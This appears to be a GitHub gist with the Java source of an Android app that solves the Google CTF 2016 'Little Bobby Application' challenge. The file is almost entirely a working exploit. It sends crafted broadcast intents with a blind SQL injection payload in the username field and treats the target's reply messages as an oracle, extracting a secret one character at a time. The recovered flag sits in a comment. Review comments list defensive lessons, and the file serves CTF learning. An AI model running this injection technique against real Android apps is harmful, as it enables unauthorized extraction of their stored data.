
@bburky
Created May 1, 2016 17:14
Google CTF 2016 - Little Bobby Application solution
package com.bburky.bobbyapplication_exploit;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.support.v7.app.ActionBarActivity;
import android.os.Bundle;
import android.util.Log;
import android.widget.TextView;
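/**
 * Solution activity for the Google CTF 2016 "Little Bobby Application" challenge.
 *
 * <p>The activity sends a login broadcast whose {@code username} extra carries a boolean
 * SQL condition on one character of the flag, then reads the target's reply broadcast.
 * A reply of {@code "Incorrect password"} is treated as "condition was true", which lets
 * the flag be recovered one character at a time.
 *
 * <p>NOTE(review): the target app is not shown here; the technique implies it concatenates
 * the {@code username} extra into a SQL statement and returns distinguishable messages.
 * The defensive takeaways are: bind parameters instead of building SQL from strings,
 * protect broadcast receivers that accept credentials with a permission (or do not export
 * them), and return one uniform failure message so responses cannot act as an oracle.
 */
public class MainActivity extends ActionBarActivity {
    // ctf{An injection is all you need to get this flag - 08fdc2c757be2ea1067f0c36d4ca2634}
    private final String flagPrefix = "ctf{An injection is all you need to get this flag - ";

    // Candidate currently being tested for the character at `index`.
    private char currentChar = '0';

    // Position passed to substr(); starts one past the known prefix, so positions are
    // treated as 1-based (presumably SQLite semantics; confirm against the target).
    private int index = flagPrefix.length() + 1;

    // Characters recovered so far (the part after the known prefix).
    private String flag = "";

    // Kept in a field so the receiver can be unregistered when the activity is destroyed.
    private Receiver receiver;

    /**
     * Registers the receiver for the target's reply broadcast and sends the first probe.
     *
     * @param savedInstanceState saved state passed through to the superclass
     */
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        Log.w("exploit", "Starting exploit...");
        IntentFilter intentFilter = new IntentFilter("com.bobbytables.ctf.myapplication_OUTPUTINTENT");
        receiver = new Receiver();
        registerReceiver(receiver, intentFilter);
        getNextFlagCharacter();
    }

    /**
     * Unregisters the reply receiver so it is not leaked past the activity's lifetime.
     */
    @Override
    protected void onDestroy() {
        if (receiver != null) {
            unregisterReceiver(receiver);
            receiver = null;
        }
        super.onDestroy();
    }

    /**
     * Sends one login broadcast testing whether the flag character at {@code index}
     * equals {@code currentChar}. The answer arrives asynchronously in {@link Receiver}.
     */
    private void getNextFlagCharacter() {
        String injection = "\" or substr(flag," + index + ",1)=\"" + currentChar + "\" --";
        Intent intent = new Intent("com.bobbytables.ctf.myapplication_INTENT");
        intent.putExtra("username", injection);
        intent.putExtra("password", "");
        sendBroadcast(intent);
    }

    /**
     * Handles the target's reply broadcast and advances the character search.
     *
     * <p>The receiver is registered without a sender permission, so any app on the device
     * can deliver a matching broadcast; the {@code msg} extra is therefore not trusted to
     * be present.
     */
    private class Receiver extends BroadcastReceiver {
        @Override
        public void onReceive(Context context, Intent intent) {
            String msg = intent.getStringExtra("msg");
            if (msg == null) {
                // A broadcast without the extra previously crashed with a
                // NullPointerException; ignore it and leave the search state untouched.
                Log.w("exploit", "Ignoring reply broadcast without a msg extra");
                return;
            }

            boolean matched = msg.equals("Incorrect password");
            if (!matched) {
                // Wrong guess: step to the next candidate, jumping from digits to letters.
                if (currentChar == '9') {
                    currentChar = 'a';
                } else {
                    currentChar++;
                }
                getNextFlagCharacter();
                return;
            }

            // Correct guess: record it and restart the candidate scan at the next position.
            flag += currentChar;
            currentChar = '0';
            index++;

            // 32 positions are read after the prefix (index runs up to prefix length + 32).
            if (index < flagPrefix.length() + 33) {
                getNextFlagCharacter();
            } else {
                Log.w("exploit", flagPrefix + flag + "}");
            }

            // Show progress (or the final value) in the UI after every recovered character.
            TextView text = (TextView) findViewById(R.id.text);
            text.setText(flagPrefix + flag + "}");
        }
    }
}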